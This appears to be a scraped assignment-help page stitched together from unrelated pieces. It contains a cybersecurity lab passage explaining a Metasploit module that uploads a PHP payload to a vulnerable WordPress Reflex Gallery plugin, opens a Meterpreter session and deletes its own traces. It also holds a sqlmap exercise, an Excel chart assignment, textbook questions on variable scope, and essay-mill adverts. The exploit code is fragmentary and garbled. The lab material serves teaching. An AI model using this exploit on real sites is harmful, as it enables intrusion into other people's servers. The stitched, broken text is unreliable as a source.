Nobody wants to be a script kiddie, and, sadly, in-memory DLL injection is beyond the scope of our skills at this point, but we can at least look at the exploit we just used and understand it. The link to the announcement and code for this exploit is actually listed as part of the  wpscan  output from Milestone 2 (rapid7 is the company that sells the commercial version of Metasploit). From there, you can get to the code for this exploit in Github. It’s written in Ruby. Don’t know Ruby? Doesn’t matter. Let’s look anyway:

Badge Earned: Script Kiddie

Milestone 6: Going Deeper

 

 

11/2/2020 Lab: Unit 8 – Cybersecurity University | CodePath Courses

https://courses.codepath.org/courses/cybersecurity_university/unit/8#!exercises 11/13

require ‘msf/core’

class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking

include Msf::Exploit::Remote::HTTP::Wordpress include Msf::Exploit::FileDropper

This is the  class  declaration of the module and associated  require  /  include  statements pulling in the required parts of MSF. Lines 11 and 12 show the payload and its delivery mechanism are just components of MSF.

Line 47 shows how the filename of the dropped payload is created randomly, and lines 49 – 51 show how the MIME attachment is created and how the encoded  payload  is added to it as a binary data stream, which is serialized as a string for the  POST  request.

And here’s the multipart upload  POST  request, which just mimics what the browser sends to the WordPress server when the user uploads a file. The plugin accepts the binary content just as it would for an image. Note the  uri  value contains the components of the path to the vulnerable source in the plugin.

if res.code == 200 && res.body =~ /success|#{php_pagename}/ print_good(“Our payload is at: #{php_pagename}. Calling payload…”) register_files_for_cleanup(php_pagename)

If the response code is OK, the module marks the uploaded file for cleanup, which happens immediately after the next step. The payload is deleted so obvious forensic evidence of the hack isn’t left on the target server.

Finally, the payload is activated via another HTTP request, which opens the Meterpreter connection.

def exploit php_pagename = rand_text_alpha(8 + rand(8)) + ‘.php’

data = Rex::MIME::Message.new data.add_part(payload.encoded, ‘application/octet-stream’, nil, “form-data; name=\”qqfi post_data = data.to_s

res = send_request_cgi({ ‘uri’ => normalize_uri(wordpress_url_plugins, ‘reflex-gallery’, ‘admin’, ‘script ‘method’ => ‘POST’, ‘vars_get’ => { ‘Year’ => “#{year}”, ‘Month’ => “#{month}” }, ‘ctype’ => “multipart/form-data; boundary=#{data.bound}”, ‘data’ => post_data })

send_request_cgi( ‘uri’ => normalize_uri(wordpress_url_wp_content, ‘uploads’, “#{year}”, “#{month )

 

 

11/2/2020 Lab: Unit 8 – Cybersecurity University | CodePath Courses

https://courses.codepath.org/courses/cybersecurity_university/unit/8#!exercises 12/13

One takeaway from this is that the framework, MSF, is doing all the heavy lifting here: the payload is provided (even in encoded form), activating it is a single function call, and even the cleanup is provided as a core function. All the author had to do here was create and issue a multipart  POST request.

Challenge: Now that we’ve walked through the exploit, go back to the Reflex Gallery plugin code and identify the fix — specifically, what was changed in the plugin code to prevent this attack?

Hints:

The plugin is written in PHP and Javascript — which part would this fix need be in, and why? Use the source browser changelog viewer to diff specific commits If you ran the MSF exploit agains the fixed version of the plugin, what specifically would fail? Two files related to the vulnerability were substantially changed between the two versions

If you think back to all of the Security Shepherd exercises around SQL injection, you probably noticed that finding the right combination of characters and expressions to use would very often boil down to trial and error, educated guesswork, and sometimes dumb luck. Being a coder, you may have thought it’d be nice to have a tool that automates all that guessing and testing. Say hello to our little friend  sqlmap , which does exactly that: given a URL and a parameter string, this tool will attempt to identify SQLI-vulnerable parameters by systematically trying various SQLI exploits — pretty much all of them — and if it finds the right way in, it can exfiltrate an entire database.

As such, one of the tricks to using  sqlmap  is knowing how not to use it. In the wrong hands, it becomes an accidental load-testing tool, firing off thousands of requests from multiple threads and crashing a database. In the right hands, it can identify novel routes for exploitation.

Read the usage docs on this one. In addition to the standard parameters, make sure you understand  threads ,  risk , and  level  that allow throttling and control how aggressively the tool will run. Try different verbosity settings to see what it’s actually doing under the hood.

Challenge: Examine this writeup about a recent SQLI vulnerability in a WP plugin. Follow the same process as before to identify the affected version from the changelog, install it manually, then recreate the exploit described in the writeup using  sqlmap  and confirm the researcher’s results.

Hints:

Actually read the usage docs Expect issues, be patient.  sqlmap  is basically hammering your WP VM, which isn’t designed to handle a heavy load. Look at the output carefully, even if there’s an error. Does it match the original findings? To see what it’s doing, try running with high verbosity ( -vvvv ). Try  CTRL-C  and  (S)skip  if something seems to hangs When in doubt, accept the default.

Milestone 7: Hello,  sqlmap

 

 

11/2/2020 Lab: Unit 8 – Cybersecurity University | CodePath Courses

https://courses.codepath.org/courses/cybersecurity_university/unit/8#!exercises 13/13

 
Do you need a similar assignment done for you from scratch? Order now!
Use Discount Code "Newclient" for a 15% Discount!

How To Work On A Spreed Sheet Document Using The Information Given Assignment Help

Improve It Project 3-7

Windows   Mac

Central Sierra Insurance is a multi-office company that handles commercial and personal insurance products. In this project, you add missing data and verify that the charts are updated.

[Student Learning Outcomes 3.2, 3.3, 3.4]

File Needed: CentralSierra-03.xlsx (Available from the Start File link.)

Completed Project File Name: [your name]-CentralSierra-03.xlsx

Skills Covered in This Project

  • Edit source data.
  • Switch row and column data.
  • Change chart colors.
  • Apply a chart style.
  • Add and format elements in a chart.
  • Use gradient fill for a chart object.
  • Change the chart type.

Alternate Instruction for Microsoft 365 Apps icon This image appears when a project instruction has changed to accommodate an update to Microsoft 365 Apps. If the instruction does not match your version of Office, try using the alternate instruction instead.

  1. Open CentralSierra-03.xlsx the start file workbook. The start file will be renamed automatically to include your name. Change the file name if directed to do so by your instructor and save it.
  2. Insert a new row at row 8.
  3. Type Motorcycle in cell A8. In cells B8:D8, type these values: 15, 82, and 24.
  4. Change the pie chart object to a 3-D Pie and apply Style 3. Notice that a data series for “Motorcycle” has been added.
  5. Switch the row and column data for the column chart. The data series for “Motorcycle” is not included.
  6. Click the Select Data button [Chart Design tab, Data group] and reset the source data to show cells A5:D10.
    Alternate Instruction for Microsoft 365 Apps iconClick the Select Data button [Chart Tools Design tab, Data group] and reset the source data to show cells A5:D10.
  7. Change the column chart color scheme to Monochromatic Palette 7 in the Monochromatic group.
  8. Format chart elements.Figure 3-76a Excel 3-7 Linear Down gradientFigure 3-76a Linear Down gradient
    1. Select the Side Wall of the column chart and apply Olive Green, Accent 3 shape fill (seventh column).
    2. Use the Shape Fill button to apply the Linear Down gradient in the Light Variations group to the side wall (Figure 3-76a).
    3. Apply the same fill and gradient to the Walls element.
    4. Select the Floor element and apply Olive Green, Accent 3, Lighter 60% (seventh column) with no gradient.
    5. Select the gridlines and use the Shape Outline button to format them with Black, Text 1, Lighter 50% (second column). (To select the gridlines, select the Plot Area and then click one of the gridlines in the chart.)
  9. Select the pie chart object and change the colors to Monochromatic Palette 7 in the Monochromatic group.
  10. Use Olive Green, Accent 3 as shape fill (seventh column) for the pie chart area with a Linear Down gradient from the light variations.
  11. Apply a 1 pt Olive Green, Accent 3, Darker 25% outline (seventh column) to both chart objects.
  12. Save and close the workbook (Figure 3-76).
  13. Upload and save your project file.
  14. Submit project for grading.
 
Do you need a similar assignment done for you from scratch? Order now!
Use Discount Code "Newclient" for a 15% Discount!

Programming Language assignment

Programming Language assignment

Kim 4

Textbook Assignment 2 : Introduction

1. Question 3.2. In Fortan 77, local variables were typically allocated statically. In Algol and its descendants (e.g., Ada and C), they are typically allocated in the stack. In Lisp they are typically allocated at least partially in the heap. What accounts for these differences? Give an example of a program in Ada or C that would not work correctly if local variables were allocated statically. Give and example of a program in Scheme or Common Lisp that would not work correctly if local variables were allocated on the stack.

2. Question 3.4. Give three concrete examples drawn from programming languages with which you are familiar in which a variable is live but not in scope.

3. Question 3.5. Consider the following pseudocode: Suppose this was code for a language with the declaration-order rules of C(but with nested subroutines) – that is, names must be declared before use, and the scope of a name extends from its declaration through the end of the block. At each print statement, indicate which declarations of a and b are in the referencing environment. What does the program print (or will the compiler identify static semantic errors)? Repeat the exercise for the declaration-order rules of C# (names must be declared before use, but the scope of a name is the entire block in which it is declared) and of Modula-3 (names can be declared in any order, and their scope is the entire block in which they are declared).

 

 

4. Question 3.7. A part of the development team at MumbleTech.com, Janet has written a list manipulation library for C that contains, among other things, the code in Figure 3.16.

a. Accustomed to Java, new team member Brad includes the following code in the main loop of his program: Sadly, after running for a while, Brad’s program always runs out of memory and crashes. Explain what’s going wrong.

b. After Janet patiently explains the problem to him, Brad gives it another try: This seems to solve the insufficient memory problem, but where the program used to produce correct results (before running out of memory), now its output is strangely corrupted, and Brad goes back to Janet for advice. What will she tell him this time?

5. Question 3.14. Consider the following pseudocode: What does this program print if the language uses static scoping? What does it print with dynamic scoping? Why?

 

6. Question 3.18. Consider the following pseudocode: Assume that the language uses dynamic scoping. What does the program print if the language uses shallow binding? What does it print with deep binding? Why?

 
Do you need a similar assignment done for you from scratch? Order now!
Use Discount Code "Newclient" for a 15% Discount!